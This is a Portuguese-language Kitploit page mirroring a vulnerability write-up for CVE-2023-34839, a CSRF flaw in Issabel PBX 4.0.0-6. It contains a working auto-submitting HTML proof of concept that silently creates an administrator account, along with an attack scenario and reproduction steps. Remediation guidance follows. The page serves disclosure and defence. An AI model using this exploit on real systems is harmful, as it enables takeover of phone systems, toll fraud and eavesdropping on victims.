Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-34839 — CVE-2023-34839 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas de código aberto amplamente utilizada. | Kitploit
Ferramentas/GitHubGitHub/sahiloj/cve-2023-34839
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas de código aberto amplamente utilizada.

Ver Repositório
53há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-34839 — Issabel PBX 4.0.0-6: CSRF para Escalação de Privilégios

CVE Severity CVSS Affected Version


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Software Afetado
  • Pontuação CVSS
  • Cenário de Ataque
  • Prova de Conceito (PoC)
  • Passos para Reproduzir
  • Impacto
  • Remediação
  • Referências
  • Aviso Legal

Visão Geral

CVE-2023-34839 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas open-source amplamente utilizada. A vulnerabilidade reside no endpoint de gerenciamento de usuários e permite que um atacante remoto não autenticado crie silenciosamente uma nova conta de administrador, enganando um administrador atualmente autenticado para que visite uma página web especialmente criada.


Detalhes da Vulnerabilidade

O Issabel PBX 4.0.0-6 não implementa proteções contra CSRF (por exemplo, tokens sincronizadores, atributos de cookie SameSite ou validação dos cabeçalhos Origin / Referer) no endpoint de criação de usuário:

root@kitploit:~
POST /index.php?menu=userlist&action=new

Como a aplicação depende exclusivamente de cookies de sessão para autenticação e não realiza validação de requisições que alteram estado, uma requisição POST forjada enviada de qualquer origem será aceita e processada com todos os privilégios da sessão do administrador conectado.

Causa raiz: Ausência de validação de token anti-CSRF em endpoints administrativos que alteram estado.

Classe de vulnerabilidade: CWE-352 — Cross-Site Request Forgery (CSRF)


Software Afetado

SoftwareVersãoStatus
Issabel PBX4.0.0-6Vulnerável ✔
  • Página do Fornecedor: https://www.issabel.org/
  • Código-fonte: https://github.com/IssabelFoundation/issabelPBX

Pontuação CVSS


Cenário de Ataque

Um atacante pode explorar esta vulnerabilidade seguindo estes passos de alto nível:

  1. Criar uma página HTML maliciosa que contenha um formulário oculto direcionado ao endpoint de criação de usuário do Issabel PBX, com valores controlados pelo atacante (nome de usuário, senha, grupo = administrador).
  2. Hospedar a página maliciosa em um servidor ou enviá-la ao administrador alvo por e-mail de phishing, mensagem de chat ou qualquer vetor de engenharia social.
  3. Aguardar o administrador abrir o link enquanto possui uma sessão ativa e autenticada com a aplicação Issabel PBX.
  4. O navegador envia o formulário automaticamente usando o cookie de sessão existente da vítima, fazendo com que a aplicação crie silenciosamente uma nova conta de administrador.
  5. O atacante faz login com as credenciais recém-criadas e obtém acesso total de administrador ao sistema PBX, incluindo roteamento de chamadas, gravações, configuração de troncos SIP e todas as configurações do sistema.

Nenhuma interação além de uma única visita à página é necessária por parte da vítima.


Prova de Conceito (PoC)

⚠️ Apenas para fins educacionais e de testes autorizados.
Substitua localhost pelo nome de host ou endereço IP da instância Issabel PBX alvo.
Se estiver testando contra um endpoint https:// com certificado autoassinado, você deve primeiro visitar a URL alvo no mesmo navegador e aceitar o aviso de certificado; caso contrário, o navegador bloqueará o envio do formulário cross-origin.

root@kitploit:~
<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

O arquivo de exploit também está disponível neste repositório: CSRF Exploit.html


Passos para Reproduzir

Pré-requisitos

  • Uma instância do Issabel PBX 4.0.0-6 em execução.
  • Uma conta de administrador com uma sessão de navegador ativa.
  • Um navegador na mesma máquina da sessão do administrador.

Passo 1 — Faça login no Issabel PBX como Administrador

Acesse a interface web do Issabel PBX e faça login com as credenciais de administrador.

Login do Issabel PBX


Passo 2 — Prepare o Exploit de CSRF

Copie o código HTML do PoC acima e salve-o como um arquivo .html, substituindo localhost pelo nome de host ou endereço IP real da instância Issabel alvo.

O exploit usa campos de formulário ocultos para enviar silenciosamente uma requisição POST de criação de novo usuário para a aplicação. Quando a página carrega, o JavaScript embutido envia o formulário imediatamente, sem nenhuma ação visível do usuário.

HTML do Exploit de CSRF


Passo 3 — Abra o Exploit no Mesmo Navegador

Abra o arquivo HTML salvo no mesmo navegador (em uma nova aba) enquanto a sessão do administrador ainda estiver ativa. O formulário será enviado automaticamente imediatamente após o carregamento da página.


Passo 4 — Verifique se a Nova Conta de Administrador Foi Criada

Volte ao painel de Gerenciamento de Usuários do Issabel PBX. Uma nova conta de usuário (neste PoC, chamada CSRF) terá sido criada com privilégios totais de Administrador — sem qualquer interação adicional além de abrir a página do exploit.

Novo Usuário Administrador Criado


Impacto

A exploração bem-sucedida do CVE-2023-34839 permite que um atacante:

  • Crie contas de administrador fraudulentas no sistema PBX, fornecendo acesso persistente com privilégios totais.
  • Modifique o roteamento de chamadas e troncos SIP, possibilitando escuta não autorizada ou fraude de tarifas (toll fraud).
  • Acesse gravações de correio de voz e registros de detalhes de chamadas (CDRs), resultando na divulgação de informações sensíveis.
  • Bloqueie administradores legítimos alterando senhas ou excluindo contas existentes.
  • Interrompa as comunicações alterando ou excluindo a configuração do PBX.

Como a conta fraudulenta persiste mesmo após o término da sessão da vítima, o atacante mantém o acesso indefinidamente até que a conta seja descoberta e removida.


Remediação

Administradores e desenvolvedores do Issabel PBX devem aplicar as seguintes mitigações:

  1. Implemente Tokens Anti-CSRF: Gere um token único, imprevisível e vinculado à sessão para cada formulário que altere estado. Valide o token no servidor antes de processar qualquer requisição POST.

  2. Aplique SameSite=Strict ou SameSite=Lax nos Cookies de Sessão: Isso instrui os navegadores a não enviarem cookies em requisições entre sites, prevenindo efetivamente ataques CSRF clássicos em navegadores modernos.

  3. Valide os Cabeçalhos Origin e Referer: Rejeite requisições cujo cabeçalho Origin ou Referer não corresponda ao domínio esperado da aplicação.

  4. Exija Reautenticação para Ações Sensíveis: Solicite a senha atual do administrador antes de permitir a criação de novas contas de nível administrativo.

  5. Aplique as Últimas Correções de Segurança: Acompanhe a página de lançamentos do Issabel e o repositório oficial para correções relacionadas a este CVE.


Referências

  • NVD — CVE-2023-34839
  • OWASP — Cross-Site Request Forgery (CSRF)
  • CWE-352: Cross-Site Request Forgery
  • Site Oficial do Issabel
  • IssabelFoundation/issabelPBX no GitHub

Aviso Legal

Este repositório destina-se estritamente a fins educacionais e pesquisas de segurança autorizadas. As informações e o código de prova de conceito fornecidos aqui devem ser usados apenas contra sistemas que você possua ou para os quais tenha permissão explícita por escrito para testar. O uso não autorizado deste exploit contra sistemas que você não possui é ilegal e pode resultar em processo criminal. O autor não assume nenhuma responsabilidade por qualquer uso indevido das informações contidas neste repositório.

Baixar ferramenta
CampoValor
ID do CVECVE-2023-34839
Data23 de junho de 2023
PesquisadorSahil Ojha
FornecedorIssabel
ProdutoIssabel PBX
Versão4.0.0-6
Testado EmWindows
MétricaValor
Vetor CVSS v3.1AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Pontuação Base8.8 (Alta)
Vetor de AtaqueRede
Complexidade de AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNecessária (visita do administrador)
EscopoInalterado
ConfidencialidadeAlta
IntegridadeAlta
DisponibilidadeAlta